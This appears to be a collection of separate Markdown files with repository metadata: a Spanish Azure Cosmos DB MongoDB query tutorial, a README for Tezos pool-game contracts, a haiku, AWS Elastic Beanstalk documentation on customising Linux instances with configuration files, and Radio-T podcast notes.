[Remove-CsNetworkInterRegionRoute](Remove-CsNetworkInterRegionRoute.md) [Get-CsNetworkInterRegionRoute](Get-CsNetworkInterRegionRoute.md)
36.137255
315
0.781769
eng_Latn
0.945577
bb34c62cd061e6cfff75576bf8323352661c78d3
7,955
md
Markdown
articles/cosmos-db/tutorial-query-mongodb.md
Almulo/azure-docs.es-es
f1916cdaa2952cbe247723758a13b3ec3d608863
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/cosmos-db/tutorial-query-mongodb.md
Almulo/azure-docs.es-es
f1916cdaa2952cbe247723758a13b3ec3d608863
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/cosmos-db/tutorial-query-mongodb.md
Almulo/azure-docs.es-es
f1916cdaa2952cbe247723758a13b3ec3d608863
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: 'Azure Cosmos DB: ¿cómo realizar consultas mediante la API para MongoDB? | Microsoft Docs' description: Aprenda a realizar consultas con la API de MongoDB para Azure Cosmos DB services: cosmos-db author: SnehaGunda manager: kfile ms.service: cosmos-db ms.component: cosmosdb-mongo ms.devlang: na ms.topic: tutorial ms.date: 03/29/2018 ms.author: sngun ms.custom: mvc ms.openlocfilehash: efb59a73b3c9b0ab06fae2e7b4fe5b97d85249eb ms.sourcegitcommit: ebd06cee3e78674ba9e6764ddc889fc5948060c4 ms.translationtype: HT ms.contentlocale: es-ES ms.lasthandoff: 09/07/2018 ms.locfileid: "44052823" --- # <a name="tutorial-query-azure-cosmos-db-by-using-the-mongodb-api"></a>Tutorial: Consulta de Azure Cosmos DB mediante MongoDB API La [API para MongoDB](mongodb-introduction.md) de Azure Cosmos DB admite las [consultas de shell de MongoDB](https://docs.mongodb.com/manual/tutorial/query-documents/). En este artículo se tratan las tareas siguientes: > [!div class="checklist"] > * Consulta de datos con MongoDB Puede empezar a trabajar con los ejemplos de este documento y ver el vídeo [Consulta de Azure Cosmos DB con el shell de MongoDB](https://azure.microsoft.com/resources/videos/query-azure-cosmos-db-data-by-using-the-mongodb-shell/). ## <a name="sample-document"></a>Documento de ejemplo En las consultas de este artículo se usa el documento de ejemplo siguiente. ```json { "id": "WakefieldFamily", "parents": [ { "familyName": "Wakefield", "givenName": "Robin" }, { "familyName": "Miller", "givenName": "Ben" } ], "children": [ { "familyName": "Merriam", "givenName": "Jesse", "gender": "female", "grade": 1, "pets": [ { "givenName": "Goofy" }, { "givenName": "Shadow" } ] }, { "familyName": "Miller", "givenName": "Lisa", "gender": "female", "grade": 8 } ], "address": { "state": "NY", "county": "Manhattan", "city": "NY" }, "creationDate": 1431620462, "isRegistered": false } ``` ## <a id="examplequery1"></a> Consulta 1 de ejemplo Dado el documento de familia de ejemplo anterior, la consulta siguiente devuelve los documentos donde el campo Id. coincide con `WakefieldFamily`. **Consultar** db.families.find({ id: "WakefieldFamily"}) **Resultados** { "_id": "ObjectId(\"58f65e1198f3a12c7090e68c\")", "id": "WakefieldFamily", "parents": [ { "familyName": "Wakefield", "givenName": "Robin" }, { "familyName": "Miller", "givenName": "Ben" } ], "children": [ { "familyName": "Merriam", "givenName": "Jesse", "gender": "female", "grade": 1, "pets": [ { "givenName": "Goofy" }, { "givenName": "Shadow" } ] }, { "familyName": "Miller", "givenName": "Lisa", "gender": "female", "grade": 8 } ], "address": { "state": "NY", "county": "Manhattan", "city": "NY" }, "creationDate": 1431620462, "isRegistered": false } ## <a id="examplequery2"></a>Consulta 2 de ejemplo La consulta siguiente devuelve todos los elementos secundarios de la familia. **Consultar** db.families.find( { id: "WakefieldFamily" }, { children: true } ) **Resultados** { "_id": "ObjectId("58f65e1198f3a12c7090e68c")", "children": [ { "familyName": "Merriam", "givenName": "Jesse", "gender": "female", "grade": 1, "pets": [ { "givenName": "Goofy" }, { "givenName": "Shadow" } ] }, { "familyName": "Miller", "givenName": "Lisa", "gender": "female", "grade": 8 } ] } ## <a id="examplequery3"></a>Consulta 3 de ejemplo La consulta siguiente devuelve todas las familias que están registradas. **Consultar** db.families.find( { "isRegistered" : true }) **Resultados**: no se devolverá ningún documento. ## <a id="examplequery4"></a>Consulta 4 de ejemplo La consulta siguiente devuelve todas las familias que no están registradas. **Consultar** db.families.find( { "isRegistered" : false }) **Resultados** { "_id": ObjectId("58f65e1198f3a12c7090e68c"), "id": "WakefieldFamily", "parents": [{ "familyName": "Wakefield", "givenName": "Robin" }, { "familyName": "Miller", "givenName": "Ben" }], "children": [{ "familyName": "Merriam", "givenName": "Jesse", "gender": "female", "grade": 1, "pets": [{ "givenName": "Goofy" }, { "givenName": "Shadow" }] }, { "familyName": "Miller", "givenName": "Lisa", "gender": "female", "grade": 8 }], "address": { "state": "NY", "county": "Manhattan", "city": "NY" }, "creationDate": 1431620462, "isRegistered": false } ## <a id="examplequery5"></a>Consulta 5 de ejemplo La consulta siguiente devuelve todas las familias que no están registradas y el estado es NY. **Consultar** db.families.find( { "isRegistered" : false, "address.state" : "NY" }) **Resultados** { "_id": ObjectId("58f65e1198f3a12c7090e68c"), "id": "WakefieldFamily", "parents": [{ "familyName": "Wakefield", "givenName": "Robin" }, { "familyName": "Miller", "givenName": "Ben" }], "children": [{ "familyName": "Merriam", "givenName": "Jesse", "gender": "female", "grade": 1, "pets": [{ "givenName": "Goofy" }, { "givenName": "Shadow" }] }, { "familyName": "Miller", "givenName": "Lisa", "gender": "female", "grade": 8 }], "address": { "state": "NY", "county": "Manhattan", "city": "NY" }, "creationDate": 1431620462, "isRegistered": false } ## <a id="examplequery6"></a>Consulta 6 de ejemplo La consulta siguiente devuelve todas las familias en las que los grados de los elementos secundarios son 8. **Consultar** db.families.find( { children : { $elemMatch: { grade : 8 }} } ) **Resultados** { "_id": ObjectId("58f65e1198f3a12c7090e68c"), "id": "WakefieldFamily", "parents": [{ "familyName": "Wakefield", "givenName": "Robin" }, { "familyName": "Miller", "givenName": "Ben" }], "children": [{ "familyName": "Merriam", "givenName": "Jesse", "gender": "female", "grade": 1, "pets": [{ "givenName": "Goofy" }, { "givenName": "Shadow" }] }, { "familyName": "Miller", "givenName": "Lisa", "gender": "female", "grade": 8 }], "address": { "state": "NY", "county": "Manhattan", "city": "NY" }, "creationDate": 1431620462, "isRegistered": false } ## <a id="examplequery7"></a>Consulta 7 de ejemplo La consulta siguiente devuelve todas las familias en las que el valor de tamaño de la matriz secundaria es 3. **Consultar** db.Family.find( {children: { $size:3} } ) **Resultados** No se ha devuelto ningún resultado ya que no hay familias con más de dos hijos. Solo si el parámetro es 2, esta consulta se realizará correctamente y devolverá el documento completo. ## <a name="next-steps"></a>Pasos siguientes En este tutorial, ha hecho lo siguiente: > [!div class="checklist"] > * Ha obtenido información sobre cómo realizar consultas con MongoDB Ahora puede continuar con el tutorial siguiente para obtener información sobre cómo distribuir sus datos globalmente. > [!div class="nextstepaction"] > [Distribución de datos global](tutorial-global-distribution-sql-api.md)
25.253968
230
0.573979
spa_Latn
0.588267
bb34d6c96184206341b6f8d9bc350c52e2e1583e
5,706
md
Markdown
README.md
dimdim1177/tezos-pool-games
d5d5327944bf9dc72bc8ae9da5db2cb995201845
[ "MIT" ]
null
null
null
README.md
dimdim1177/tezos-pool-games
d5d5327944bf9dc72bc8ae9da5db2cb995201845
[ "MIT" ]
null
null
null
README.md
dimdim1177/tezos-pool-games
d5d5327944bf9dc72bc8ae9da5db2cb995201845
[ "MIT" ]
null
null
null
## Contracts for periodic reward draws on deposit pools in farms https://github.com/dimdim1177/tezos-pool-games Full code and documentation of contracts for periodic reward draws on deposit from pools in farms Crunchy or Qupipuswap. Project developed on Debian 11, not tested in other OS. The project is NOT COMPLETE, namely: - scripts for off-chain calling of contract methods are not written - all tests for CPoolGames not written - not fully tested - obviously there are sub-optimalities, because I saw Tezos and PascaLIGO a month ago for the first time ## Getting start ### Install tools Execute script `./install/install_all.sh` for download and install: LIGO, tezos-client, python, pytezos and so on. Or execute ./install/install_*.sh scripts for each tool manually. ### Compile Usage: compile.sh NAME|ALL Compile 'contracts/NAME.ligo' or 'contracts/*.ligo' for ALL. Compiled files saved to 'build/NAME.tz' and 'build/NAME.storage.tz' files. ### Tests Usage: tests.sh NAME|ALL Execute tests 'tests/NAME.ligo' or 'tests/*.ligo' for ALL. Logs saved to 'build/NAME.test.log' files. ### Deploy Usage: deploy.sh NAME|ALL [force] Deploing 'build/NAME.tz' inited by 'build/NAME.storage.tz' (or 'build/*.tz' for ALL) by account saved as 'owner' in tezos-client. ### Documentation Firstly, install submodules by `git submodule update --init --recursive`. Then execute script `./doc/doc.sh` for generate English and Russian documentations for contracts. Script usage code of subprojects, attached as git submodule: - https://github.com/dimdim1177/mlcomment Multi-Language comments - https://github.com/dimdim1177/ligo2dox Convert PascaLIGO to C++ like code for auto-documenting by Doxygen The html-en and html-ru folders and their contents are generated automatically. Presentation about the project in text files slides-en/*.slide (all other files in the folder are generated by scripts), the `slides.sh` script generates a video presentation slides-en/video.mp4. ## Contracts ### Contract with pools See contracts/CPoolGames.ligo and folder contracts/CPoolGames. Main features: - Support 2 farms interfaces: Crunchy and QUIPU - Three algorithms to determine the winner: - Probability of win proportional time in current game - Probability of win proportional sum of time * deposit in current game - Equal probabilities for all users in pool - Additional pool options: - minimal deposit - minimal seconds in game - maximum deposit (only for algorithm by sum time * deposit) - win percent, burn percent, fee percent - burn token, fee address - Flexible code configuration (see contracts/CPoolGames/config.ligo): - pool owner/admins or pool as service - can enable security transfer tokens (remove operator after transfer) - can enable pool statictics in blockchain for promotion - can enable pool views for other smart contracts ### Contract for generate random numbers See contracts/CRandom.ligo and folder contracts/CRandom Main features: - Any can request random number in future - Request has caller address and ID of object - Random number based on nearest Tezos block hash with time more time in request and XORed with hash of request, that is why one Tezos block generate different random numbers for different requests with the same time. ### Lexem prefixes - **C** - Contract - **M** - Module - **t_** - Type - **c_** - Constant - **cERR_** - Constant with error code for failwith ## Folders tree ### contracts Folder with contracts code. Files by mask contracts/CONTRACT_NAME.ligo compiled as contracts. Folder contracts/CONTRACT_NAME used for contract specific includes and modules. File contracts/CONTRACT_NAME/config.ligo contains contract configuration defines. File contracts/CONTRACT_NAME/initial_storage.ligo contains initial storage description. #### contracts/include Common includes for all contracts. #### contracts/module Common modules for all contracts. #### contracts/CPoolGames Includes and modules specific for contract contracts/CPoolGames.ligo. #### contracts/CRandom Includes and modules specific for contract contracts/CRandom.ligo. ### doc Documentation folder. File algo.xlsx - example in comparing table of changeing weights users and game in different alrorithms in different situations for simplify understanding weight code logic. #### html-en English documentation, please open doc/html-en/index.html #### html-ru Russian documentation, please open doc/html-ru/index.html #### doc/mlcomment https://github.com/dimdim1177/mlcomment Multi-Language comments #### doc/ligo2dox https://github.com/dimdim1177/ligo2dox Convert PascaLIGO to C++ like code for auto-documenting by Doxygen #### doc/slides-en English text for slides in *.slide and other auto-generated by slides.sh files #### doc/slides-ru Russian text for slides in *.slide and other auto-generated by slides.sh files ### accounts Folder with *.json faucet files, downloaded from https://teztnets.xyz/, basename of file used as account name in tezos-client. One of it must be named as owner.json, this account used for deploy contracts. Script `accounts/activate.sh` activate all accounts in testnet. ### build Folder for compiled files *.tz, logs *.log and so on. ### install Folder with scripts for install development tools: LIGO, tezos-client and so on. ### tezbin Binaries from tezos: tezos-client and so on. ### tests Unit tests in LIGO. See tests `tests/CPoolGames.ligo` and `tests/CRandom.ligo`. #### tests/include Common tests code #### tests/CPoolGames Only CPoolGames test code for include. #### tests/CRandom Only CRandom test code for include. ### venv Virtual envoriment for python
31.877095
217
0.764984
eng_Latn
0.97767
bb34e174e554f87ee7d4643896faae94c945d384
143
md
Markdown
_haikus/head_in_the_cloud.md
computerboi1/cloud_haiku
151077dcf0b43253271e60286bb889b6f3ed33d3
[ "MIT" ]
null
null
null
_haikus/head_in_the_cloud.md
computerboi1/cloud_haiku
151077dcf0b43253271e60286bb889b6f3ed33d3
[ "MIT" ]
null
null
null
_haikus/head_in_the_cloud.md
computerboi1/cloud_haiku
151077dcf0b43253271e60286bb889b6f3ed33d3
[ "MIT" ]
null
null
null
--- layout: haiku title: Head In The Cloud author: Saksham --- Repository<br> Contribute To Open Source<br> The Goal Of Our Life<br>
14.3
30
0.678322
eng_Latn
0.670613
bb34fe6f0e40d982521868c42af42fe0f5cdaf59
20,095
md
Markdown
documents/aws-elastic-beanstalk-developer-guide/doc_source/customize-containers-ec2.md
siagholami/aws-documentation
2d06ee9011f3192b2ff38c09f04e01f1ea9e0191
[ "CC-BY-4.0" ]
5
2021-08-13T09:20:58.000Z
2021-12-16T22:13:54.000Z
documents/aws-elastic-beanstalk-developer-guide/doc_source/customize-containers-ec2.md
siagholami/aws-documentation
2d06ee9011f3192b2ff38c09f04e01f1ea9e0191
[ "CC-BY-4.0" ]
null
null
null
documents/aws-elastic-beanstalk-developer-guide/doc_source/customize-containers-ec2.md
siagholami/aws-documentation
2d06ee9011f3192b2ff38c09f04e01f1ea9e0191
[ "CC-BY-4.0" ]
null
null
null
# Customizing software on Linux servers<a name="customize-containers-ec2"></a> You may want to customize and configure the software that your application depends on\. You can add commands to be executed during instance provisioning; define Linux users and groups; and download or directly create files on your environment instances\. These files might be either dependencies required by the application—for example, additional packages from the yum repository—or they might be configuration files such as a replacement for a proxy configuration file to override specific settings that are defaulted by Elastic Beanstalk\. This section describes the type of information you can include in a configuration file to customize the software on your EC2 instances running Linux\. For general information about customizing and configuring your Elastic Beanstalk environments, see [Configuring Elastic Beanstalk environments](customize-containers.md)\. For information about customizing software on your EC2 instances running Windows, see [Customizing software on Windows servers](customize-containers-windows-ec2.md)\. **Notes** On Amazon Linux 2 platforms, instead of providing files and commands in \.ebextensions configuration files, we highly recommend that you use *Buildfile*\. *Procfile*, and *platform hooks* whenever possible to configure and run custom code on your environment instances during instance provisioning\. For details about these mechanisms, see [Extending Elastic Beanstalk Linux platforms](platforms-linux-extend.md)\. YAML relies on consistent indentation\. Match the indentation level when replacing content in an example configuration file and ensure that your text editor uses spaces, not tab characters, to indent\. Configuration files support the following keys that affect the Linux server your application runs on\. **Topics** + [Packages](#linux-packages) + [Groups](#linux-groups) + [Users](#linux-users) + [Sources](#linux-sources) + [Files](#linux-files) + [Commands](#linux-commands) + [Services](#linux-services) + [Container commands](#linux-container-commands) + [Example: Using custom amazon CloudWatch metrics](customize-containers-cw.md) Keys are processed in the order that they are listed here\. Watch your environment's [events](using-features.events.md) while developing and testing configuration files\. Elastic Beanstalk ignores a configuration file that contains validation errors, like an invalid key, and doesn't process any of the other keys in the same file\. When this happens, Elastic Beanstalk adds a warning event to the event log\. ## Packages<a name="linux-packages"></a> You can use the `packages` key to download and install prepackaged applications and components\. ### Syntax<a name="linux-packages-syntax"></a> ``` packages: name of package manager: package name: version ... name of package manager: package name: version ... ... ``` You can specify multiple packages under each package manager's key\. ### Supported package formats<a name="linux-packages-support"></a> Elastic Beanstalk currently supports the following package managers: yum, rubygems, python, and rpm\. Packages are processed in the following order: rpm, yum, and then rubygems and python\. There is no ordering between rubygems and python\. Within each package manager, package installation order isn't guaranteed\. Use a package manager supported by your operating system\. **Note** Elastic Beanstalk supports two underlying package managers for Python, pip and easy\_install\. However, in the syntax of the configuration file, you must specify the package manager name as `python`\. When you use a configuration file to specify a Python package manager, Elastic Beanstalk uses Python 2\.7\. If your application relies on a different version of Python, you can specify the packages to install in a `requirements.txt` file\. For more information, see [Specifying dependencies using a requirements file](python-configuration-requirements.md)\. ### Specifying versions<a name="linux-packages-versions"></a> Within each package manager, each package is specified as a package name and a list of versions\. The version can be a string, a list of versions, or an empty string or list\. An empty string or list indicates that you want the latest version\. For rpm manager, the version is specified as a path to a file on disk or a URL\. Relative paths are not supported\. If you specify a version of a package, Elastic Beanstalk attempts to install that version even if a newer version of the package is already installed on the instance\. If a newer version is already installed, the deployment fails\. Some package managers support multiple versions, but others may not\. Please check the documentation for your package manager for more information\. If you do not specify a version and a version of the package is already installed, Elastic Beanstalk does not install a new version—it assumes that you want to keep and use the existing version\. ### Example snippet<a name="linux-packages-snippet"></a> The following snippet specifies a version URL for rpm, requests the latest version from yum, and version 0\.10\.2 of chef from rubygems\. ``` packages: yum: libmemcached: [] ruby-devel: [] gcc: [] rpm: epel: http://download.fedoraproject.org/pub/epel/5/i386/epel-release-5-4.noarch.rpm rubygems: chef: '0.10.2' ``` ## Groups<a name="linux-groups"></a> You can use the `groups` key to create Linux/UNIX groups and to assign group IDs\. To create a group, add a new key\-value pair that maps a new group name to an optional group ID\. The groups key can contain one or more group names\. The following table lists the available keys\. ### Syntax<a name="linux-groups-syntax"></a> ``` groups: name of group: {} name of group: gid: "group id" ``` ### Options<a name="linux-groups-options"></a> `gid` A group ID number\. If a group ID is specified, and the group already exists by name, the group creation will fail\. If another group has the specified group ID, the operating system may reject the group creation\. ### Example snippet<a name="linux-groups-snippet"></a> The following snippet specifies a group named groupOne without assigning a group ID and a group named groupTwo that specified a group ID value of 45\. ``` groups: groupOne: {} groupTwo: gid: "45" ``` ## Users<a name="linux-users"></a> You can use the `users` key to create Linux/UNIX users on the EC2 instance\. ### Syntax<a name="linux-users-syntax"></a> ``` users: name of user: groups: - name of group uid: "id of the user" homeDir: "user's home directory" ``` ### Options<a name="linux-users-options"></a> `uid` A user ID\. The creation process fails if the user name exists with a different user ID\. If the user ID is already assigned to an existing user, the operating system may reject the creation request\. `groups` A list of group names\. The user is added to each group in the list\. `homeDir` The user's home directory\. Users are created as noninteractive system users with a shell of `/sbin/nologin`\. This is by design and cannot be modified\. ### Example snippet<a name="linux-users-snippet"></a> ``` users: myuser: groups: - group1 - group2 uid: "50" homeDir: "/tmp" ``` ## Sources<a name="linux-sources"></a> You can use the `sources` key to download an archive file from a public URL and unpack it in a target directory on the EC2 instance\. ### Syntax<a name="linux-sources-syntax"></a> ``` sources: target directory: location of archive file ``` ### Supported formats<a name="linux-sources-support"></a> Supported formats are tar, tar\+gzip, tar\+bz2, and zip\. You can reference external locations such as Amazon Simple Storage Service \(Amazon S3\) \(e\.g\., `https://mybucket.s3.amazonaws.com/myobject`\) as long as the URL is publicly accessible\. ### Example snippet<a name="linux-sources-example"></a> The following example downloads a public \.zip file from an Amazon S3 bucket and unpacks it into `/etc/myapp`: ``` sources: /etc/myapp: https://mybucket.s3.amazonaws.com/myobject ``` **Note** Multiple extractions should not reuse the same target path\. Extracting another source to the same target path will replace rather than append to the contents\. ## Files<a name="linux-files"></a> You can use the `files` key to create files on the EC2 instance\. The content can be either inline in the configuration file, or the content can be pulled from a URL\. The files are written to disk in lexicographic order\. You can use the `files` key to download private files from Amazon S3 by providing an instance profile for authorization\. If the file path you specify already exists on the instance, the existing file is retained with the extension `.bak` appended to its name\. ### Syntax<a name="linux-files-syntax"></a> ``` files: "target file location on disk": mode: "six-digit octal value" owner: name of owning user for file group: name of owning group for file source: URL authentication: authentication name: "target file location on disk": mode: "six-digit octal value" owner: name of owning user for file group: name of owning group for file content: | # this is my # file content encoding: encoding format authentication: authentication name: ``` ### Options<a name="linux-files-options"></a> `content` String content to add to the file\. Specify either `content` or `source`, but not both\. `source` URL of a file to download\. Specify either `content` or `source`, but not both\. `encoding` The encoding format of the string specified with the `content` option\. Valid values: `plain` \| `base64` `group` Linux group that owns the file\. `owner` Linux user that owns the file\. `mode` A six\-digit octal value representing the mode for this file\. Not supported for Windows systems\. Use the first three digits for symlinks and the last three digits for setting permissions\. To create a symlink, specify `120xxx`, where `xxx` defines the permissions of the target file\. To specify permissions for a file, use the last three digits, such as `000644`\. `authentication` The name of a [AWS CloudFormation authentication method](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-authentication.html) to use\. You can add authentication methods to the Auto Scaling group metadata with the Resources key\. See below for an example\. ### Example snippet<a name="linux-files-snippet"></a> ``` files: "/home/ec2-user/myfile" : mode: "000755" owner: root group: root source: http://foo.bar/myfile "/home/ec2-user/myfile2" : mode: "000755" owner: root group: root content: | this is my file content ``` Example using a symlink\. This creates a link `/tmp/myfile2.txt` that points at the existing file `/tmp/myfile1.txt`\. ``` files: "/tmp/myfile2.txt" : mode: "120400" content: "/tmp/myfile1.txt" ``` The following example uses the Resources key to add an authentication method named S3Auth and uses it to download a private file from an Amazon S3 bucket: ``` Resources: AWSEBAutoScalingGroup: Metadata: AWS::CloudFormation::Authentication: S3Auth: type: "s3" buckets: ["elasticbeanstalk-us-west-2-123456789012"] roleName: "Fn::GetOptionSetting": Namespace: "aws:autoscaling:launchconfiguration" OptionName: "IamInstanceProfile" DefaultValue: "aws-elasticbeanstalk-ec2-role" files: "/tmp/data.json" : mode: "000755" owner: root group: root authentication: "S3Auth" source: https://elasticbeanstalk-us-west-2-123456789012.s3-us-west-2.amazonaws.com/data.json ``` ## Commands<a name="linux-commands"></a> You can use the `commands` key to execute commands on the EC2 instance\. The commands run before the application and web server are set up and the application version file is extracted\. The specified commands run as the root user, and are processed in alphabetical order by name\. By default, commands run in the root directory\. To run commands from another directory, use the `cwd` option\. To troubleshoot issues with your commands, you can find their output in [instance logs](using-features.logging.md)\. ### Syntax<a name="linux-commands-syntax"></a> ``` commands: command name: command: command to run cwd: working directory env: variable name: variable value test: conditions for command ignoreErrors: true ``` ### Options<a name="linux-commands-options"></a> `command` Either an array \([block sequence collection](http://yaml.org/spec/1.2/spec.html#id2759963) in YAML syntax\) or a string specifying the command to run\. Some important notes: + If you use a string, you don't need to enclose the entire string in quotes\. If you do use quotes, escape literal occurrences of the same type of quote\. + If you use an array, you don't need to escape space characters or enclose command parameters in quotes\. Each array element is a single command argument\. Don't use an array to specify multiple commands\. The following examples are all equivalent: ``` commands: command1: command: git commit -m "This is a comment." command2: command: "git commit -m \"This is a comment.\"" command3: command: 'git commit -m "This is a comment."' command4: command: - git - commit - -m - This is a comment. ``` To specify multiple commands, use a [literal block scalar](http://yaml.org/spec/1.2/spec.html#id2760844), as shown in the following example\. ``` commands: command block: command: | git commit -m "This is a comment." git push ``` `env` \(Optional\) Sets environment variables for the command\. This property overwrites, rather than appends, the existing environment\. `cwd` \(Optional\) The working directory\. If not specified, commands run from the root directory \(/\)\. `test` \(Optional\) A command that must return the value `true` \(exit code 0\) in order for Elastic Beanstalk to process the command, such as a shell script, contained in the `command` key\. `ignoreErrors` \(Optional\) A boolean value that determines if other commands should run if the command contained in the `command` key fails \(returns a nonzero value\)\. Set this value to `true` if you want to continue running commands even if the command fails\. Set it to `false` if you want to stop running commands if the command fails\. The default value is `false`\. ### Example snippet<a name="linux-commands-snippet"></a> The following example snippet runs a Python script\. ``` commands: python_install: command: myscript.py cwd: /home/ec2-user env: myvarname: myvarvalue test: "[ -x /usr/bin/python ]" ``` ## Services<a name="linux-services"></a> You can use the `services` key to define which services should be started or stopped when the instance is launched\. The `services` key also allows you to specify dependencies on sources, packages, and files so that if a restart is needed due to files being installed, Elastic Beanstalk takes care of the service restart\. ### Syntax<a name="linux-services-syntax"></a> ``` services: sysvinit: name of service: enabled: "true" ensureRunning: "true" files: - "file name" sources: - "directory" packages: name of package manager: "package name[: version]" commands: - "name of command" ``` ### Options<a name="linux-services-options"></a> `ensureRunning` Set to `true` to ensure that the service is running after Elastic Beanstalk finishes\. Set to `false` to ensure that the service is not running after Elastic Beanstalk finishes\. Omit this key to make no changes to the service state\. `enabled` Set to `true` to ensure that the service is started automatically upon boot\. Set to `false` to ensure that the service is not started automatically upon boot\. Omit this key to make no changes to this property\. `files` A list of files\. If Elastic Beanstalk changes one directly via the files block, the service is restarted\. `sources` A list of directories\. If Elastic Beanstalk expands an archive into one of these directories, the service is restarted\. `packages` A map of the package manager to a list of package names\. If Elastic Beanstalk installs or updates one of these packages, the service is restarted\. `commands` A list of command names\. If Elastic Beanstalk runs the specified command, the service is restarted\. ### Example snippet<a name="linux-services-snippet"></a> The following is an example snippet: ``` services: sysvinit: myservice: enabled: true ensureRunning: true ``` ## Container commands<a name="linux-container-commands"></a> You can use the `container_commands` key to execute commands that affect your application source code\. Container commands run after the application and web server have been set up and the application version archive has been extracted, but before the application version is deployed\. Non\-container commands and other customization operations are performed prior to the application source code being extracted\. The specified commands run as the root user, and are processed in alphabetical order by name\. Container commands are run from the staging directory, where your source code is extracted prior to being deployed to the application server\. Any changes you make to your source code in the staging directory with a container command will be included when the source is deployed to its final location\. To troubleshoot issues with your container commands, you can find their output in [instance logs](using-features.logging.md)\. You can use `leader_only` to only run the command on a single instance, or configure a `test` to only run the command when a test command evaluates to `true`\. Leader\-only container commands are only executed during environment creation and deployments, while other commands and server customization operations are performed every time an instance is provisioned or updated\. Leader\-only container commands are not executed due to launch configuration changes, such as a change in the AMI Id or instance type\. ### Syntax<a name="linux-container-commands-syntax"></a> ``` container_commands: name of container_command: command: "command to run" leader_only: true name of container_command: command: "command to run" ``` ### Options<a name="linux-container-commands-options"></a> `command` A string or array of strings to run\. `env` \(Optional\) Set environment variables prior to running the command, overriding any existing value\. `cwd` \(Optional\) The working directory\. By default, this is the staging directory of the unzipped application\. `leader_only` \(Optional\) Only run the command on a single instance chosen by Elastic Beanstalk\. Leader\-only container commands are run before other container commands\. A command can be leader\-only or have a `test`, but not both \(`leader_only` takes precedence\)\. `test` \(Optional\) Run a test command that must return the `true` in order to run the container command\. A command can be leader\-only or have a `test`, but not both \(`leader_only` takes precedence\)\. `ignoreErrors` \(Optional\) Do not fail deployments if the container command returns a value other than 0 \(success\)\. Set to `true` to enable\. ### Example snippet<a name="linux-container-commands-snippet"></a> The following is an example snippet\. ``` container_commands: collectstatic: command: "django-admin.py collectstatic --noinput" 01syncdb: command: "django-admin.py syncdb --noinput" leader_only: true 02migrate: command: "django-admin.py migrate" leader_only: true 99customize: command: "scripts/customize.sh" ```
42.216387
576
0.733615
eng_Latn
0.996342
bb363ab8f35a60c21783e4d872b0ac0e84c38730
549
md
Markdown
hugo/content/posts/podcast-94.md
Reeywhaar/radio-t-site
e88967492d07d0c0157cc02ab4acaf28263edeb6
[ "MIT" ]
null
null
null
hugo/content/posts/podcast-94.md
Reeywhaar/radio-t-site
e88967492d07d0c0157cc02ab4acaf28263edeb6
[ "MIT" ]
null
null
null
hugo/content/posts/podcast-94.md
Reeywhaar/radio-t-site
e88967492d07d0c0157cc02ab4acaf28263edeb6
[ "MIT" ]
null
null
null
+++ title = "Радио-Т 94" date = "2008-07-13T08:53:00" categories = ["podcast"] filename = "rt_podcast94" +++ - Разговор со специальным гостем о мобильных хай–теках - Удар Apple по нашей лояльности - DNS под угрозой - Большие SSD приближаются - Удвоению не быть? - Еще один отечественный компьютер - Google наделал странного - 2x экранный ноутбук - Low-Tech взлом FT - Пиратские новости и радости - Темы наших слушателей [аудио](http://cdn.radio-t.com/rt_podcast94.mp3) <audio src="http://cdn.radio-t.com/rt_podcast94.mp3" preload="none"></audio>
23.869565
76
0.737705
rus_Cyrl
0.653098
bb36e50ff00e4fda5cef3e2c1c60aea5ccd7bd0e
1,753
md
Markdown
wdk-ddi-src/content/pointofservicedriverinterface/ns-pointofservicedriverinterface-_msr_deauthenticate_device.md
MikeMacelletti/windows-driver-docs-ddi
5436c618dff46f9320544766618c9ab4bef6a35e
[ "CC-BY-4.0", "MIT" ]
null
null
null
wdk-ddi-src/content/pointofservicedriverinterface/ns-pointofservicedriverinterface-_msr_deauthenticate_device.md
MikeMacelletti/windows-driver-docs-ddi
5436c618dff46f9320544766618c9ab4bef6a35e
[ "CC-BY-4.0", "MIT" ]
null
null
null
wdk-ddi-src/content/pointofservicedriverinterface/ns-pointofservicedriverinterface-_msr_deauthenticate_device.md
MikeMacelletti/windows-driver-docs-ddi
5436c618dff46f9320544766618c9ab4bef6a35e
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- UID: NS:pointofservicedriverinterface._MSR_DEAUTHENTICATE_DEVICE title: _MSR_DEAUTHENTICATE_DEVICE (pointofservicedriverinterface.h) description: This structure provides the information necessary to deauthenticate the device. old-location: pos\msr_deauthenticate_device.htm tech.root: pos ms.assetid: 7174a342-de02-4a3c-8bb9-9c86e7f4b5e1 ms.date: 02/23/2018 keywords: ["_MSR_DEAUTHENTICATE_DEVICE structure"] ms.keywords: "*PMSR_DEAUTHENTICATE_DEVICE, MSR_DEAUTHENTICATE_DEVICE, MSR_DEAUTHENTICATE_DEVICE structure, PMSR_DEAUTHENTICATE_DEVICE, PMSR_DEAUTHENTICATE_DEVICE structure pointer, _MSR_DEAUTHENTICATE_DEVICE, pointofservicedriverinterface/MSR_DEAUTHENTICATE_DEVICE, pointofservicedriverinterface/PMSR_DEAUTHENTICATE_DEVICE, pos.msr_deauthenticate_device" f1_keywords: - "pointofservicedriverinterface/MSR_DEAUTHENTICATE_DEVICE" req.header: pointofservicedriverinterface.h req.include-header: PointOfServiceDriverInterface.h req.target-type: Windows req.target-min-winverclnt: req.target-min-winversvr: req.kmdf-ver: req.umdf-ver: req.ddi-compliance: req.unicode-ansi: req.idl: req.max-support: req.namespace: req.assembly: req.type-library: req.lib: req.dll: req.irql: topic_type: - APIRef - kbSyntax api_type: - HeaderDef api_location: - PointOfServiceDriverInterface.h api_name: - MSR_DEAUTHENTICATE_DEVICE product: - Windows targetos: Windows req.typenames: MSR_DEAUTHENTICATE_DEVICE, *PMSR_DEAUTHENTICATE_DEVICE --- # _MSR_DEAUTHENTICATE_DEVICE structure ## -description This structure provides the information necessary to deauthenticate the device. ## -struct-fields ### -field Challenge2 The challenge token used to deauthenticate the device.
27.825397
355
0.805476
yue_Hant
0.905253
bb3798fd2c83f087cb343b5ebe5a9a594247ffdd
1,156
md
Markdown
src/about.md
ehuss/rustc-code-reading-club
43cb6a1a7a63abc42b0667cd53df1b9170fe4f2d
[ "Apache-2.0" ]
null
null
null
src/about.md
ehuss/rustc-code-reading-club
43cb6a1a7a63abc42b0667cd53df1b9170fe4f2d
[ "Apache-2.0" ]
null
null
null
src/about.md
